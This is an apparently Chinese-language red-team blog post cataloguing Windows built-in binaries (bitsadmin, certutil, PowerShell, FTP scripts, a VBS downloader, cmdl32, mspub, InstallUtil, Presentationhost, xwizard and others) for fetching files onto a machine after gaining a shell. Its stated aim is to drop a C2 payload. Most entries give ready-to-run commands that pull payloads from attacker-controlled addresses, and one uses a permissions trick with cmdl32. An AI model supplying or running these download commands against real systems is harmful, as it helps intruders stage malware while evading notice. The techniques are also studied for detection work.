Bitsadmin
Certutil
powershell
FTP
cscript
cmdl32
Mspub.exe
ConfigSecurityPolicy.exe
Installutil
Presentationhost.exe
Xwizard.exe
其他
前言
我们在渗透过程中,当获取到一个shell能够执行命令的同时,想要上线c2,就要先将文件传输到目标,并用到一些命令行中的下载命令如BITSAdmin、Certutil、 powershell、HH等。
本文将列举一部分文件落地的下载方式。无文件落地不在本篇范围内。
Bitsadmin
BITSAdmin 是一个命令行工具,可用于创建下载或上传作业并监视作业的进度。
3文件路径:
C:\Windos\System32\Bitsadmin.exe
支持系统:
WindowsServer 2022、WindowsServer 2019、Windows Server 2016、Windows Server 2012、Windows 10、Windows7
用法:
bitsadmin /transfer myDownLoadJob /download /priority normal "http://url/a.ps1" "c:\b.ps1"
bitsadmin /rawreturn /transfer getfile http://url/s.zip c:\s1.zip
bitsadmin /rawreturn /transfer getpayload http://url/c.zip c:\c1.zip
Certutil
certutil是Windows自带的证书管理工具,具有下载文件,校验文件MD5、SHA1、SHA256,文件base64编码等功能。
文件路径:
C:\Windows\System32\Certutil.exe
支持系统:
windows
用法:
#保存文件并指定新文件名
certutil.exe -urlcache -split -f http://url/1.txt file.jsp
注:使用下载,会在工具缓存目录产生缓存文件
#缓存路径
C:\Users\xq\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
#查看缓存项目:
certutil.exe -urlcache *
powershell
自win7/win 2008开始,win系统增加了powershell工具。
PowerShell是一种命令行外壳程序和脚本环境
文件路径:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
支持系统:
win7/win2008 =<
用法:
powershell (new-objectNet.WebClient).DownloadFile('http://url/aa.ps1','c:\bb.ps1')
FTP
将文件传输到运行文件传输协议的计算机 (ftp) 服务器服务。可以通过处理 ASCII 文本文件以交互方式或在批处理模式下使用此命令。
文件路径:
支持系统:
windows
用法:
cmd无交互
echo open 192.168.225.79>ftp.txt
echo user>>ftp.txt
echo pass>>ftp.txt
echo get /sd.exe>>ftp.txt
echo quit>>ftp.txt
@ftp -s:ftp.txtVBS脚本
cscript
在windows中还支持一种VBS后缀脚本语言,可看作VB语言的简化版
文件路径:
C:\Windows\System32
支持系统:
windows
用法:
cmd无交互
echo Set Post = CreateObject("Msxml2.XMLHTTP") >> download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >> download.vbs
echo Post.Open "GET","http://192.168.203.140/a.ps1",0 >> download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >> download.vbs
echo aGet.Mode = 3 >> download.vbs
echo aGet.Type = 1 >> download.vbs
echo aGet.Open() >> download.vbs
echo aGet.Write(Post.responseBody) >> download.vbs
echo aGet.SaveToFile "D:/a.ps1",2 >> download.vbs
#执行
cscript downfile.vbs
省略······
除了上述这些经典的方法,我还总结了一些tips
cmdl32
Microsoft 连接管理器自动下载。
文件路径:
C:\Windows\System32\cmdl32.exe
C:\Windows\SysWOW64\cmdl32.exe
支持系统:
WindowsVista、Windows7、Windows8、Windows8.1、Windows10、Windows11
从配置文件中指定的网址下载文件。下载的文件将位于名称 VPNXXXX.tmp 下的 %TMP% 中
用法:
创建文本 1.txt
[Connection Manager]
CMSFile=1.txt
ServiceName=WindowsUpdate
TunnelFile=1.txt
[Settings]
UpdateUrl=http://192.168.3.114:81/test.txt
#赋予权限,设置缓存位置,并下载
icacls %cd% /deny %Username%:(OI)(CI)(DE,DC)
set tmp=%cd%
cmdl32 /vpn /lan %cd%\1.txt
#删除权限,否则无法操作文件
icacls %cd% /remove:d %username%
Mspub.exe
mspub.exe是属于Microsoft Publisher产品的主要流程,允许制作商业和个人时事通讯和出版物。包含在office套件中。
文件路径:
C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe
C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe
C:\Program Files\Microsoft Office\Office16\MSPUB.exe
C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe
C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe
C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe
C:\Program Files\Microsoft Office\Office15\MSPUB.exe
C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe
C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe
C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe
C:\Program Files\Microsoft Office\Office14\MSPUB.exe
支持系统:
Windows 10、Windows 11
该命令将下载远程文件并放入缓存文件夹
%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE
用法:
该方法依赖offce套件,执行后将会打开publisher应用窗口。
从远程服务器下载负载
mspub.exe https://example.com/aaaa
ConfigSecurityPolicy.exe
Defender文件,用于管理Windows Defender中的设置。
文件路径:
C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
支持系统:
Windows 10、Windows 11
用法:
该命令将下载远程文件并放入缓存文件夹 win10:
%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE
ConfigSecurityPolicy.exe https://example.com/aaaa
Installutil
是一个命令行实用程序,允许通过在指定程序集中执行安装程序组件来安装和卸载。此工具与System.Configuration.Install命名空间中的类一起工作。
文件路径:
C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
支持系统:
Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
用法:
该命令将下载远程文件并放入缓存文件夹
#win10:
%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
#win7:
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files
InstallUtil.exe https://www.baidu.com/img/flexible/logo/pc/result.png
Presentationhost.exe
它使 WPF 应用程序可承载于兼容的浏览器,用于运行XAML浏览器应用程序 .
文件路径:
C:\Windows\System32\Presentationhost.exe
C:\Windows\SysWOW64\Presentationhost.exe
支持系统:
Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
用法:
该方法是调用IE浏览器下载,会弹出ie窗口及文件保存窗口,此时无需保存,文件已存在缓存目录内
该命令将下载远程文件并放入缓存文件夹
#win10:
%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE
#win7:
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files
Presentationhost.exe https://www.baidu.com/img/flexible/logo/pc/result.png
Xwizard.exe
执行已添加到注册表的自定义类或使用Xwizard.exe下载
文件路径:
C:\Windows\System32\xwizard.exe
C:\Windows\SysWOW64\xwizard.exe
支持系统:
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
用法:
使用该方法时,会弹出错误警告窗口。但文件已经存入ie缓存目录
Xwizard.exe使用RemoteApp和桌面连接向导下载文件,并将其保存到
%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>
或
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files
xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z
https://www.baidu.com/img/flexible/logo/pc/result.png
其他
这里只总结了一小部分方法,除此之外还有很多能够用来远程下载文件的系统应用。
...........................................
标签:Files,文件,exe,windows,汇总,Microsoft,Windows,echo,远程 From: https://www.cnblogs.com/o-O-oO/p/18347520原创 雷石安全实验室